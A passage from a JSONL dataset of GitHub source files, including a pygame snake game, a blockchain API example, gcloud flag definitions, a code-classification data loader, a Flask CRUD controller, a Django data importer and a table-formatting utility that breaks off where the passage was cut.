еду\n pygame.draw.rect(self.__display, self.green,\n [self.__game.board().food().x() * self.__block_size,\n self.__margin_top + self.__game.board().food().y() * self.__block_size,\n self.__block_size, self.__block_size])\n\n # Show info line at the top of the window\n # 1) draw rect for top info line\n pygame.draw.rect(self.__display, self.color_top_info_line, [0, 0, self.__window_width, self.__margin_top])\n font_info_line = pygame.font.SysFont(font_info_line_name, 20)\n # 2) level\n str_level = f'LVL {self.__game.level()}'\n surf_level = font_info_line.render(str_level, True, self.color_info_line_text)\n level_width, level_height = font_info_line.size(str_level)\n self.__display.blit(surf_level, [int((self.__window_width / 3 - level_width) / 2),\n int((self.__margin_top - level_height) / 2)])\n # 3) score\n str_score = str(self.__game.score())\n surf_score = font_info_line.render(str_score, True, self.black)\n score_width, score_height = font_info_line.size(str_score)\n self.__display.blit(surf_score, [int((self.__window_width - score_width) / 2),\n int((self.__margin_top - score_height) / 2)])\n # 4) head (x,y)\n str_xy = f'(x:{self.__game.board().snake().head().x()}, y:{self.__game.board().snake().head().y()})'\n surf_xy = font_info_line.render(str_xy, True, self.gray)\n xy_width, xy_height = font_info_line.size(str_xy)\n self.__display.blit(surf_xy, [int(self.__window_width / 3 * 2 + (self.__window_width / 3 - xy_width) / 2),\n int((self.__margin_top - xy_height) / 2)])\n # Если игра на паузе, но не геймовер - выводим надпись \"пауза\" на экране\n if self.__game.is_paused() and not self.__game.is_gameover():\n font_paused = pygame.font.SysFont(font_paused_name, 75)\n surf_paused = font_paused.render(str_paused, True, self.red)\n paused_width, paused_height = font_paused.size(str_paused)\n self.__display.blit(surf_paused, [int((self.__window_width - paused_width) / 2),\n int((self.__window_height - paused_height) / 2)])\n\n # GAMEOVER screen\n if self.__state 
== self.state_gameover:\n font_logo = pygame.font.SysFont(font_logo_name, 60)\n surf_logo = font_logo.render(str_game_over, True, self.red)\n logo_width, logo_height = font_logo.size(str_game_over)\n self.__display.blit(surf_logo, [int((self.__window_width - logo_width) / 2),\n int((self.__window_height - logo_height) / 2)])\n\n # Вывод на экран + задержка в зависимости от уровня игры\n pygame.display.update()\n self.__clock.tick(self.__base_speed + self.__game.level())\n\n def game_loop(self):\n \"\"\"\n Цикл событий игры. Получаем ввод от игрока, реагируем на него, по результатм отрисовываем очередной кадр.\n По выходу из цикла, игра завершается.\n \"\"\"\n while not self.__game.is_quit():\n for event in pygame.event.get():\n # Реагируем на закрытие окна - завершаем игру\n if event.type == pygame.QUIT:\n self.__game.quit()\n # STATES\n # MENU\n if self.__state == self.state_menu:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.__state = self.state_game\n elif event.key == pygame.K_ESCAPE:\n self.__game.quit()\n # GAME OVER\n elif self.__state == self.state_gameover:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n self.__state = self.state_menu\n self.__game.reset()\n elif event.key == pygame.K_ESCAPE:\n self.__game.quit()\n # GAME\n elif self.__state == self.state_game:\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n self.__game.board().snake().set_direction(Snake.direction_right)\n elif event.key == pygame.K_DOWN or event.key == pygame.K_s:\n self.__game.board().snake().set_direction(Snake.direction_down)\n elif event.key == pygame.K_LEFT or event.key == pygame.K_a:\n self.__game.board().snake().set_direction(Snake.direction_left)\n elif event.key == pygame.K_UP or event.key == pygame.K_w:\n self.__game.board().snake().set_direction(Snake.direction_up)\n elif event.key == pygame.K_SPACE:\n self.__game.toggle_pause()\n elif event.key == pygame.K_ESCAPE:\n self.__state = self.state_gameover\n self.__game.game_over()\n\n if self.__state == self.state_game:\n self.__game.make_turn()\n if self.__game.is_gameover():\n self.__state = self.state_gameover\n\n self.draw_frame()\n","repo_name":"hazadus/object-snake","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6969486342","text":"from theblockchainapi import BlockchainAPIResource, Blockchain, BlockchainNetwork\nimport json\n\n# Get an API key pair for free here: https://dashboard.blockchainapi.com/api-keys\nMY_API_KEY_ID = None\nMY_API_SECRET_KEY = None\n\nBLOCKCHAIN = Blockchain.SOLANA\nNETWORK = BlockchainNetwork.SolanaNetwork.MAINNET_BETA\n# NETWORK = BlockchainNetwork.SolanaNetwork.DEVNET\n\n# BLOCKCHAIN = Blockchain.ETHEREUM\n# NETWORK = BlockchainNetwork.EthereumNetwork.MAINNET\n# NETWORK = BlockchainNetwork.EthereumNetwork.ROPSTEN\n\nBLOCKCHAIN_API_RESOURCE = BlockchainAPIResource(\n api_key_id=MY_API_KEY_ID,\n api_secret_key=MY_API_SECRET_KEY,\n blockchain=BLOCKCHAIN,\n network=NETWORK\n)\n\n\ndef example():\n try:\n assert MY_API_KEY_ID is not None\n assert MY_API_SECRET_KEY is not None\n except AssertionError:\n raise Exception(\"Fill in your key ID pair!\")\n\n if BLOCKCHAIN.value == Blockchain.SOLANA.value:\n # This is the transaction signature for a transaction that lists an NFT on SolSea.\n # From `mainnet-beta`\n tx_id = 
\"5H7o5YND5X7q4RgtKpmawqR9S7WuUwdnzj2uA5B7vCUvvVQVgNzk1CgMyH3duDXsapCcNgKufAeMZrijWaThCj9T\"\n else:\n # From `ropsten`\n tx_id = '0x2e81c50888bb80f763fb52870240fdad2fa87a8e95c8c729367c9f145fb85b59'\n\n transaction_info = BLOCKCHAIN_API_RESOURCE.get_transaction(transaction_blockchain_identifier=tx_id)\n\n print(json.dumps(transaction_info, indent=4, sort_keys=True))\n\n\nif __name__ == '__main__':\n example()\n","repo_name":"BL0CK-X/blockchain-api","sub_path":"examples/transaction/get-transaction/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"14058104571","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom googlecloudsdk.calliope import base\n\nDESCRIPTION_FLAG = base.Argument(\n '--description',\n help=\"\"\"\n The text that will be used to describe a notification configuration.\"\"\",\n)\n\n# Note:\n# SCC's custom --filter is passing the streaming config filter as part of\n# the request body. However --filter is a global filter flag in gcloud. The\n# --filter flag in gcloud (outside of this command) is used for client side\n# filtering. This has led to a collision in logic as gcloud believes the\n# update is trying to perform client side filtering. In the context of\n# notifications, it is instead updating the streaming config filter.\n#\n# Any future new commands should reconsider not using --filter for this logic\n# and perhaps use a different name to avoid any collisions with gcloud logic.\nFILTER_FLAG = base.Argument(\n '--filter',\n help=\"\"\"\n Filter to be used for notification config.\n \"\"\",\n)\n\nFILTER_FLAG_LONG_DESCRIPTION = base.Argument(\n '--filter',\n help=\"\"\"\n The filter string which will applied to events of findings of a\n notification configuration.\n \"\"\",\n)\n\nPAGE_TOKEN_FLAG = base.Argument(\n '--page-token',\n help=\"\"\"\n Response objects will return a non-null value for page-token to\n indicate that there is at least one additional page of data. User can\n either directly request that page by specifying the page-token\n explicitly or let gcloud fetch one-page-at-a-time.\"\"\",\n)\n\nPUBSUB_TOPIC_OPTIONAL_FLAG = base.Argument(\n '--pubsub-topic',\n help=\"\"\"\n The Pub/Sub topic which will receive notifications. Its format is\n \"projects/[project_id]/topics/[topic]\".\n \"\"\",\n)\n\nPUBSUB_TOPIC_REQUIRED_FLAG = base.Argument(\n '--pubsub-topic',\n required=True,\n help=\"\"\"\n The Pub/Sub topic which will receive notifications. Its format is\n \"projects/[project_id]/topics/[topic]\".\n \"\"\",\n)\n\n\ndef AddNotificationConfigPositionalArgument(parser):\n \"\"\"Add Notification Config as a positional argument.\"\"\"\n parser.add_argument(\n 'NOTIFICATIONCONFIGID',\n metavar='NOTIFICATION_CONFIG_ID',\n help=\"\"\"\\\n The ID of the notification config. Formatted as\n \"organizations/123/notificationConfigs/456\" or just \"456\".\n \"\"\",\n )\n return parser\n\n\ndef AddParentGroup(parser):\n \"\"\"Set folder/org/project as mutually exclusive group.\"\"\"\n resource_group = parser.add_group(required=False, mutex=True)\n resource_group.add_argument(\n '--organization',\n help=\"\"\"\\\n Organization where the notification config resides. Formatted as\n ``organizations/123'' or just ``123''.\n \"\"\",\n )\n resource_group.add_argument(\n '--folder',\n help=\"\"\"\\\n Folder where the notification config resides. 
Formatted as\n ``folders/456'' or just ``456''.\n \"\"\",\n )\n resource_group.add_argument(\n '--project',\n help=\"\"\"\\\n Project (ID or number) where the notification config resides.\n Formatted as ``projects/789'' or just ``789''.\n \"\"\",\n )\n return parser\n","repo_name":"Flank/gcloud_cli","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/scc/notifications/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40581805675","text":"from typing import Tuple, List, Optional\nimport logging\nimport os\nimport json\nfrom tqdm import tqdm\nfrom dataclasses import dataclass\nfrom functools import partial\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom transformers import PreTrainedTokenizerFast\n\nfrom utils import load_pickle, save_pickle, multiprocess_func, read_file\nfrom parser.input_utils import prepare_model_inputs\n\n\n@dataclass\nclass Example(object):\n code: str\n label_idx: int\n label_txt: str\n\n\n@dataclass\nclass InputFeature(object):\n input_ids: torch.Tensor # [T]\n all_bb_encoder_input_ids: torch.Tensor # [max_num_bbs, T]\n cfg_matrix: torch.Tensor # [num_bbs, num_bbs]\n dfg_matrix: torch.Tensor # [num_vars, num_vars]\n bb_var_matrix: torch.Tensor # [num_bbs, num_vars]\n labels: torch.Tensor\n\n\nclass ClassificationDataset(Dataset):\n def __init__(self, features):\n super().__init__()\n self.features = features\n\n def __getitem__(self, item):\n # return_dict = self.features[item].__dict__\n # print({k: v.size() for k, v in return_dict.items()})\n return self.features[item].__dict__\n\n def __len__(self):\n return len(self.features)\n\n\ndef prepare_dataset(\n args, tokenizer, cfg_vocab, dfg_vocab, split\n) -> Tuple[ClassificationDataset, List[Example]]:\n # check split\n assert split in [\"train\", \"valid\", \"test\"]\n dataset_dir = os.path.join(args.dataset_root, \"POJ-104\")\n logging.info(f\"Start preparing {split} data...\")\n\n # load examples\n dataset_cache_path = os.path.join(\n dataset_dir, \"cache\", f\"{args.task}-{split}-dataset.pk\"\n )\n examples_cache_path = os.path.join(\n dataset_dir, \"cache\", f\"{args.task}-{split}-examples.pk\"\n )\n if args.use_data_cache and os.path.exists(examples_cache_path):\n # load parsed examples from cache\n logging.info(f\"Find cache of examples: {examples_cache_path}\")\n examples = load_pickle(examples_cache_path)\n assert isinstance(examples, list)\n assert isinstance(examples[0], Example)\n logging.info(f\"Examples are loaded from cache\")\n else:\n # load and parse examples from disk files\n logging.info(\"Start loading split metadata...\")\n with open(\n os.path.join(dataset_dir, f\"{split}.jsonl\"), mode=\"r\", encoding=\"utf-8\"\n ) as f:\n lines = f.readlines()\n\n code_dir = os.path.join(dataset_dir, \"optimized\")\n logging.info(\"Start loading data...\")\n examples = []\n # lines = lines[:20]\n for line in tqdm(lines, ascii=True):\n data = json.loads(line)\n code_path = os.path.join(\n code_dir, data[\"label\"], f\"{data['solution_id']}-Os-ffast-math.ll\"\n )\n if os.path.exists(code_path):\n code = read_file(code_path)\n examples.append(\n Example(\n code=code,\n label_idx=int(data[\"label\"]) - 1,\n label_txt=data[\"label\"],\n )\n )\n # save as cache if needed\n if args.use_data_cache:\n save_pickle(obj=examples, path=examples_cache_path)\n\n # load dataset\n if args.use_data_cache and os.path.exists(dataset_cache_path):\n # load parsed dataset from 
cache\n logging.info(f\"Find cache of dataset: {dataset_cache_path}\")\n dataset = load_pickle(dataset_cache_path)\n assert isinstance(dataset, ClassificationDataset)\n logging.info(f\"Dataset is loaded from cache\")\n else:\n # build dataset from examples\n logging.info(\"Start parsing and tokenizing...\")\n features = convert_examples_to_features(\n args=args,\n examples=examples,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n\n dataset = ClassificationDataset(features)\n\n if args.use_data_cache:\n save_pickle(obj=dataset, path=dataset_cache_path)\n\n return dataset, examples\n\n\ndef encode_example(example, args, tokenizer, cfg_vocab, dfg_vocab):\n model_inputs = prepare_model_inputs(\n args=args,\n ir_content=example.code,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n if model_inputs is None:\n return None\n\n input_feature = InputFeature(\n input_ids=torch.tensor(model_inputs[\"input_ids\"], dtype=torch.int),\n all_bb_encoder_input_ids=torch.tensor(model_inputs[\"all_bb_encoder_input_ids\"], dtype=torch.int),\n cfg_matrix=torch.tensor(model_inputs[\"cfg_matrix\"], dtype=torch.int),\n dfg_matrix=torch.tensor(model_inputs[\"dfg_matrix\"], dtype=torch.int),\n bb_var_matrix=torch.tensor(model_inputs[\"bb_var_matrix\"], dtype=torch.int),\n labels=torch.tensor([example.label_idx], dtype=torch.long)\n )\n\n return input_feature\n\n\ndef convert_examples_to_features(\n args,\n examples: List[Example],\n tokenizer: PreTrainedTokenizerFast,\n cfg_vocab: dict,\n dfg_vocab: dict,\n) -> List[Optional[InputFeature]]:\n encode_func = partial(\n encode_example,\n args=args,\n tokenizer=tokenizer,\n cfg_vocab=cfg_vocab,\n dfg_vocab=dfg_vocab,\n )\n\n features = multiprocess_func(encode_func, examples, single_thread=args.single_thread_parsing)\n features = [feature for feature in features if feature is not None]\n\n return features\n","repo_name":"NougatCA/FAIR","sub_path":"src/tasks/classification/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5468,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72722845867","text":"import logging, argparse\nfrom pog.graph.graph import Graph\nfrom pog.planning.planner import test, Searcher\nfrom pog.planning.problem import PlanningOnGraphProblem\nfrom pog.planning.utils import *\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-viewer',\n action='store_true',\n help='Enable the viewer and visualizes the plan')\n args = parser.parse_args()\n print('Arguments:', args)\n\n logFormatter = logging.Formatter(\n \"%(asctime)s [%(filename)s:%(lineno)s] [%(levelname)-5.5s] %(message)s\"\n )\n rootLogger = logging.getLogger()\n\n fileHandler = logging.FileHandler(\"pog_example/iros_2022_exp/exp2/test.log\")\n fileHandler.setFormatter(logFormatter)\n rootLogger.addHandler(fileHandler)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n rootLogger.addHandler(consoleHandler)\n\n rootLogger.setLevel(logging.INFO)\n\n # Planning\n g_start = Graph('exp2-init', file_dir='pog_example/iros_2022_exp/exp2/', file_name='init.json')\n g_goal = Graph('exp2-goal', file_dir='pog_example/iros_2022_exp/exp2/', file_name='goal.json')\n \n # Environment(g_goal)\n path = test(Searcher, problem=PlanningOnGraphProblem(g_start, g_goal, parking_place=99))\n \n action_seq = path_to_action_sequence(path) \n apply_action_sequence_to_graph(g_start, g_goal, action_seq, 
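# Reviewer note (assumption, not in the original repo): `visualize` presumably\n    # replays the plan in the viewer enabled by the `-viewer` flag parsed above;\n    # it stays False when the flag is omitted, applying the plan silently.\n    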
visualize=args.viewer)\n","repo_name":"zyjiao4728/POG-Demo","sub_path":"pog_example/iros_2022_exp/exp2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"19210143618","text":"from flask import render_template, request, redirect, url_for\r\nfrom app import app\r\nfrom app.models.cards import CardsModel\r\nimport os\r\nfrom pprint import pprint\r\n\r\napp.config[\"UPLOAD_FOLDER\"] = \"./app/static\"\r\n\r\nclass Cards:\r\n def index() -> str:\r\n lutadores = CardsModel.listar_todos()\r\n return render_template('cards/index.html', lutadores=lutadores)\r\n\r\n def novo() -> str:\r\n return render_template('cards/novo.html')\r\n\r\n def salvar() -> str:\r\n foto = request.files[\"foto\"]\r\n data = {\r\n 'nome': request.form['nome'],\r\n 'idade': request.form['idade'],\r\n 'forca': request.form['forca'],\r\n 'foto': foto.filename\r\n }\r\n \r\n if CardsModel.salvar(data):\r\n path = os.path.join(app.config[\"UPLOAD_FOLDER\"], foto.filename)\r\n foto.save(path)\r\n return redirect(url_for('index'))\r\n return 'erro ao salvar'\r\n\r\n def editar(id) -> str:\r\n lutador = CardsModel.listar_um(id)\r\n return render_template('cards/editar.html', lutador=lutador)\r\n\r\n def atualizar(id) -> str:\r\n foto = request.files[\"foto\"]\r\n \r\n data = {\r\n 'nome': request.form['nome'],\r\n 'idade': request.form['idade'],\r\n 'forca': request.form['forca'],\r\n 'foto': foto.filename\r\n }\r\n\r\n if CardsModel.atualizar(id, data):\r\n return redirect(url_for('index'))\r\n\r\n return 'houve um erro'\r\n \r\n def deletar(id) -> str:\r\n if CardsModel.deletar(id):\r\n return redirect(url_for('index'))\r\n\r\n return 'houve um erro'\r\n","repo_name":"jonribeiro23/flask-dbz","sub_path":"app/controllers/cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22981477881","text":"\nfrom Ceasefires.models import *\nimport pandas as pd\nfrom datetime import datetime\n\nfrom typing import Dict\n\nimport re\n\nimport logging\n\ndef replaceData(data: Dict[str,pd.DataFrame]):\n\n for m in [Region,Country,Ceasefire,Actor,Declaration]:\n m.objects.all().delete()\n\n try:\n R = Region.objects.get(code = -1)\n except Region.DoesNotExist:\n R = Region.objects.create(\n code = -1,\n name = \"dud\"\n )\n\n for idx,row in data[\"countries\"].iterrows():\n Country.objects.create(\n code = row.cc,\n region = R,\n name = row.location\n )\n\n for idx,row in data[\"ceasefires\"].iterrows():\n year = row.cf_effect_yr if not row.cf_effect_yr in [-1,0] else None \n month = row.cf_effect_month if not row.cf_effect_month in [-1,0] else 6\n day = row.cf_effect_day if not row.cf_effect_day in [-1,0] else 15 \n \n try:\n d = datetime.strptime(f\"{year}-{month}-{day}\",\n \"%Y-%m-%d\")\n except ValueError:\n d = None\n\n ctry = Country.objects.get(code=row.cc)\n cf = Ceasefire.objects.create(\n code = row.uniq_id,\n country = ctry,\n effect_date = d,\n )\n\n for idx,row in data[\"actors\"].iterrows():\n Actor.objects.create(\n code = row.acid,\n ucdp_code = row.ucdp_actor_id,\n name = row.actor_name\n )\n\n for idx,row in data[\"declarations\"].iterrows():\n #row[\"acid\"] = row[\"actor_name\"] + \"@\" + str(row[\"cc\"])\n\n default = lambda x: x if x not in [-1,0] else None\n year,month,day = [default(v) for v in [row.cf_dec_yr, row.cf_dec_month, row.cf_dec_day]]\n\n month = month 
if month else 6\n day = day if day else 15\n\n try:\n date = datetime.strptime(f\"{year}-{month}-{day}\",\n \"%Y-%m-%d\")\n except ValueError:\n continue\n else:\n Declaration.objects.create(\n ceasefire = Ceasefire.objects.get(code=row.uniq_id),\n #country = Country.objects.get(code=row.cc),\n actor = Actor.objects.get(code=row.acid),\n dec_date = date\n )\n","repo_name":"Peder2911/cfapi","sub_path":"Ceasefires/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23697187445","text":"from textwrap import TextWrapper\nfrom itertools import zip_longest\nimport math\nfrom operator import attrgetter\nfrom statistics import mean, median\nfrom sys import stdout\nfrom datetime import datetime\n\n\nclass Cell():\n def __init__(self, value, colindex=None, rowindex=None, spacing=None, just=None, split=None,\n print_width=None, noprint=False, label=None, initial_indent=''):\n self.value = value\n\n if self.value is None:\n self.text = ''\n elif isinstance(value, str):\n self.text = self.value\n else:\n self.text = str(self.value)\n\n self.spacing = spacing\n self.just = just if just is not None else '<'\n self.split = split\n self.noprint = noprint if noprint is not None else False\n self._print_width = print_width\n self.colindex = colindex\n self.rowindex = rowindex\n self.label = label\n self.initial_indent = initial_indent\n\n def __repr__(self):\n return self.text\n\n def __eq__(self, other):\n if self.value == other.value and self.rowindex == other.rowindex and self.colindex == other.colindex:\n return True\n else:\n return False\n\n def __lt__(self, other):\n if self.rowindex < other.rowindex:\n return True\n else:\n return False\n\n def __hash__(self):\n return hash((self.value, self.rowindex, self.colindex))\n\n def __mul__(self, other):\n return tuple(self for i in range(other))\n\n @property\n def content_width(self):\n if self.split is None:\n return len(self.initial_indent + self.text)\n else:\n return max(len(part) for part in (self.initial_indent + self.text).split(self.split))\n\n @property\n def print_width(self):\n return self._print_width if self._print_width is not None else self.content_width\n\n @print_width.setter\n def print_width(self, new_print_width):\n self._print_width = new_print_width\n\n @property\n def wrapped_text(self):\n wrapper = TextWrapper(width=self.print_width, initial_indent=self.initial_indent)\n\n if self.text.isspace():\n wrapped_text = [' ']\n elif self.split is None:\n wrapped_text = wrapper.wrap(self.text)\n else:\n parts = self.text.split(self.split)\n wrapped_text = []\n for part in parts:\n wrapped_text = wrapped_text + wrapper.wrap(part)\n\n return wrapped_text\n\n @property\n def max_lines(self):\n return len(self.wrapped_text)\n\n def write_line(self, lineno, file):\n spacing = self.spacing if self.spacing is not None else 0\n wrapped_text = self.wrapped_text\n\n if 0<= lineno < len(wrapped_text):\n text = wrapped_text[lineno]\n file.write(f\"{' ' * spacing}{text:{self.just}{self.print_width}}\")\n else:\n file.write(f\"{' ' * spacing}{' ' * self.print_width}\")\n\n def write(self, file):\n for i in range(self.max_lines):\n self.write_line(i, file)\n file.write('\\n')\n\n\n# test = Column([\"This is no a test\", \"This is a test\"])\n# print(test.pref_width)\n\nclass Cells:\n def __init__(self, *cells):\n self.cells = cells\n self.table = self._tabulate()\n\n def _tabulate(self):\n table = {}\n for cell in 
self.cells:\n if cell.colindex in table:\n table[cell.colindex][cell.rowindex] = table[cell.colindex].get(cell.rowindex, tuple()) + (cell,)\n else:\n table[cell.colindex] = {}\n table[cell.colindex][cell.rowindex] = (cell,)\n\n return table\n\n def set_cell_width(self, width):\n for cell in self.cells:\n if cell.colindex in width:\n cell.print_width = width[cell.colindex]\n\n return self\n\n def _sortedrowindices(self):\n return sorted(tuple(set(cell.rowindex for cell in self.cells)))\n\n def _getrow(self, rowindex, *colindices, width, spacing):\n row = ()\n for colindex in colindices:\n row = row + self.table[colindex].get(rowindex, (Cell(None, print_width=width[colindex], spacing=spacing[colindex]),))\n\n return Row(*row)\n\n def _getrowlabels(self, row):\n labels = tuple()\n for cell in row.cells:\n if cell.label is not None:\n for i, label in enumerate(cell.label):\n if i < len(labels) and label != labels[i]:\n labels = labels + (label,)\n elif i >= len(labels):\n labels = labels + (label,)\n\n return labels\n\n def _make_rowlabel(self, previous_row_label, current_row_label):\n j = 0\n for i in range(len(current_row_label)):\n if i < len(previous_row_label):\n if current_row_label[i] != previous_row_label[i]:\n j = i\n break\n\n return j\n\n def getrowgroup(self, *colindices, width, spacing):\n for i, rowindex in enumerate(self._sortedrowindices()):\n current_row = self._getrow(rowindex, *colindices, width=width, spacing=spacing)\n current_row_label = self._getrowlabels(current_row)\n\n if i == 0:\n differ_at = 0\n rows = (current_row,)\n previous_row_label = current_row_label\n else:\n if previous_row_label == current_row_label:\n rows = rows + (current_row,)\n else:\n yield RowGroup(*rows, rowlabel=RowLabel(*previous_row_label, print_index=differ_at))\n differ_at = self._make_rowlabel(previous_row_label, current_row_label)\n rows = (current_row,)\n previous_row_label = current_row_label\n\n yield RowGroup(*rows, rowlabel=RowLabel(*previous_row_label, print_index=differ_at))\n\n\nclass Columns(Cells):\n def __init__(self, *cells, colorder=tuple(), idcols=tuple(), maxwidth=math.inf, minwidth=1, spacing=0, split='~',\n wrap=True,\n wrap_header=True, orderby=None, label=None, just='<', header_just=None):\n Cells.__init__(self, *cells)\n self._columns = self.columns = self.cells\n self._rows = self.rows = self.cells\n self.colorder = colorder\n self.idcols = idcols\n self._maxwidth = self.maxwidth = maxwidth\n self._minwidth = self.minwidth = minwidth\n self._spacing = self.spacing = spacing\n self._wrap = self.wrap = wrap\n self._wrap_header = self.wrap_header = wrap_header\n self._label = self.label = label\n self._just = self.just = just\n self._header_just = self.header_just = header_just\n self.split = split if split is not None else '~'\n self.pages = {0: self.colorder}\n\n for cell in self.cells:\n cell.spacing = self.spacing.get(cell.colindex, 0)\n cell.just = self.just.get(cell.colindex, '<')\n cell.split = self.split\n\n self.width = {0: {}}\n for column in self.colorder:\n self.width[0][column] = self.get_pref_width(column)\n\n def set_width(self, pageindex, column, value):\n self.width[pageindex][column] = value\n\n @property\n def columns(self):\n return self._columns\n\n @columns.setter\n def columns(self, cells):\n self._columns = {}\n for cell in cells:\n if cell.colindex in self._columns:\n self._columns[cell.colindex] = self._columns[cell.colindex] + (cell,)\n else:\n self._columns[cell.colindex] = (cell,)\n\n def set_property(self, value, default):\n if 
isinstance(value, dict):\n prop = value\n for column in self.colorder:\n if column not in prop:\n prop[column] = default\n elif prop[column] is None:\n prop[column] = default\n elif isinstance(value, (list, tuple)):\n prop = {}\n for i, column in enumerate(self.colorder):\n if value[i] is not None:\n prop[column] = value[i]\n else:\n prop[column] = default\n else:\n prop = {}\n if value is not None:\n for column in self.colorder:\n prop[column] = value\n else:\n for column in self.colorder:\n prop[column] = default\n\n return prop\n\n @property\n def maxwidth(self):\n return self._maxwidth\n\n @maxwidth.setter\n def maxwidth(self, value):\n self._maxwidth = self.set_property(value, math.inf)\n\n @property\n def minwidth(self):\n return self._minwidth\n\n @minwidth.setter\n def minwidth(self, value):\n self._minwidth = self.set_property(value, 1)\n\n @property\n def spacing(self):\n return self._spacing\n\n @spacing.setter\n def spacing(self, value):\n self._spacing = self.set_property(value, 0)\n\n @property\n def wrap(self):\n return self._wrap\n\n @wrap.setter\n def wrap(self, value):\n self._wrap = self.set_property(value, True)\n\n @property\n def wrap_header(self):\n return self._wrap_header\n\n @wrap_header.setter\n def wrap_header(self, value):\n self._wrap_header = self.set_property(value, True)\n\n @property\n def label(self):\n return self._label\n\n @label.setter\n def label(self, value):\n self._label = self.set_property(value, '')\n\n @property\n def just(self):\n return self._just\n\n @just.setter\n def just(self, value):\n self._just = self.set_property(value, '<')\n\n @property\n def header_just(self):\n return self._header_just\n\n @header_just.setter\n def header_just(self, value):\n if isinstance(value, dict):\n self._header_just = value\n for column in self.colorder:\n if column not in self._header_just:\n self._header_just[column] = self.just[column]\n elif self._header_just[column] is None:\n self._header_just[column] = self.just[column]\n elif isinstance(value, (list, tuple)):\n self._header_just = {}\n for i, column in enumerate(self.colorder):\n if value[i] is not None:\n self._header_just[column] = value[i]\n else:\n self._header_just[column] = self.just[column]\n else:\n self._header_just = {}\n if value is not None:\n for column in self.colorder:\n self._header_just[column] = value\n else:\n for column in self.colorder:\n self._header_just[column] = self.just[column]\n\n def get_max_content_width(self, column):\n return max(cell.content_width for cell in self.columns[column])\n\n def get_avg_content_width(self, column):\n return mean(cell.content_width for cell in self.columns[column])\n\n def get_pref_min_width(self, column):\n if not self.wrap[column]:\n if not self.wrap_header[column]:\n return max(self.minwidth[column], self.get_max_content_width(column),\n *(len(string) for string in self.label[column].split(self.split)))\n else:\n return max(self.minwidth[column], self.get_max_content_width(column))\n else:\n if not self.wrap_header[column]:\n return max(self.minwidth[column], *(len(string) for string in self.label[column].split(self.split)))\n else:\n return self.minwidth[column]\n\n def get_pref_width(self, column):\n return min(self.maxwidth[column], max(self.get_max_content_width(column), self.get_pref_min_width(column)))\n\n def recurse(self, cols, linesize, depth):\n for i, columns in enumerate(cols):\n pageindex = i + depth if depth > 0 else i\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n if 
tot_used_width < linesize:\n remain_width = linesize - tot_used_width\n while remain_width > 0 and any(\n self.width[pageindex][column] < self.maxwidth[column] for column in columns):\n tot_max_content_width = sum(\n self.get_max_content_width(column) for column in columns if\n self.width[pageindex][column] < self.maxwidth[column])\n tot_avg_content_width = sum(\n self.get_avg_content_width(column) for column in columns if\n self.width[pageindex][column] < self.maxwidth[column])\n for column in columns:\n if self.width[pageindex][column] < self.maxwidth[column]:\n width_ratio = math.ceil(\n remain_width * (self.get_avg_content_width(column) / tot_avg_content_width))\n # width_ratio = math.ceil(\n # remain_width * (self.get_max_content_width(column) / tot_max_content_width))\n self.set_width(pageindex, column, max(min(self.width[pageindex][column] + width_ratio\n , self.maxwidth[column]\n , self.get_pref_width(column) if any(\n self.width[pageindex][column] < self.get_pref_width(column) for column in\n columns) else\n self.maxwidth[column]\n , self.width[pageindex][column] + linesize - sum(\n [self.width[pageindex][column] + self.spacing[column] for column in columns])\n , linesize - self.spacing[column]),\n self.get_pref_min_width(column)))\n\n tot_used_width = sum([self.width[pageindex][column] + self.spacing[column] for column in columns])\n remain_width = linesize - tot_used_width\n\n if tot_used_width > linesize:\n excess_width = tot_used_width - linesize\n while excess_width > 0 and any(\n self.width[pageindex][column] > self.get_pref_min_width(column) for column in columns):\n tot_max_content_width = sum(\n self.get_max_content_width(column) for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column))\n tot_avg_content_width = sum(\n self.get_avg_content_width(column) for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column))\n wgt_divisor = len(\n [column for column in columns if\n self.width[pageindex][column] > self.get_pref_min_width(column)]) - 1\n for i, column in enumerate(columns):\n if self.width[pageindex][column] > self.get_pref_min_width(column):\n # print(tot_max_content_width, self.get_max_content_width(column), wgt_divisor)\n # if wgt_divisor > 0:\n # width_ratio = math.ceil(\n # excess_width * ((\n # tot_max_content_width - self.get_max_content_width(column)) / tot_max_content_width) / wgt_divisor)\n # else:\n # width_ratio = excess_width\n # width_ratio = math.ceil(\n # excess_width * (self.get_max_content_width(column) / tot_max_content_width))\n width_ratio = 